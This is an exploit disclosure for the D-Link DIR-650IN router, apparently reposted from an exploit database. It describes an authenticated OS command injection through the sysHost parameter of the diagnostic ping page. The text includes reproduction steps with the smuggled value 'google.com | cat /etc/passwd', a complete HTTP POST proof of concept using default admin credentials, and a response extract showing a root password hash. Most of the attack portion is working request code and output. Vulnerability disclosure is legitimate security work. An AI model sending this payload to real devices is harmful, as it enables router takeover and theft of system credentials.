Share
## https://sploitus.com/exploit?id=PACKETSTORM:218670
# Exploit Title: D-Link DIR-650IN - Authenticated Command Injection
    # Date: 2023-01-08
    # Exploit Author: Sanjay Singh
    # Vendor Homepage: https://www.dlink.com
    # Software Link: https://dlinkmea.com/index.php/product/details?det=T082aVdUWUFNR2FRblBBQUxMWlVTZz09
    # Version: Firmware V1.04 (REQUIRED)
    # Tested on: DIR-650IN Web UI (Boa/0.94.14rc21), Windows 10 / Chrome 108
    # CVE: N/A (Version included now, previously missing)
    
    Description:
    The D-Link DIR-650IN Wireless N300 Router is vulnerable to an Authenticated Command Injection vulnerability in the Diagnostic (Ping / Traceroute) functionality.
    
    The parameter sysHost is not sanitized, allowing an authenticated attacker (even with low-privilege access) to inject OS commands. Exploitation leads to full compromise of the router, including reading sensitive system files such as /etc/passwd.
    
    Steps to Reproduce:
    1. Log in to the router web interface.
    2. Go to Management โ†’ Diagnostic.
    3. Select Ping or Traceroute.
    4. Enter: google.com | cat /etc/passwd
    5. Click Apply.
    6. Output includes /etc/passwd contents.
    
    HTTP PoC:
    POST /boafrm/formSysCmd HTTP/1.1
    Host: 192.168.0.1
    Authorization: Basic YWRtaW46YWRtaW4=
    Content-Type: application/x-www-form-urlencoded
    
    submit-url=%2Fsyscmd.htm&sysCmd=ping&sysCmdType=ping&checkNum=5&sysHost=google.com%7Ccat%20/etc/passwd&apply=Apply
    
    Response Extract:
    root:XEOFcsRJLyXbQ:0:0:root:/:/bin/sh
    nobody:x:0:0:nobody:/:/dev/null
    
    References:
    https://www.dlink.com
    https://dlinkmea.com/index.php/product/details?det=T082aVdUWUFNR2FRblBBQUxMWlVTZz09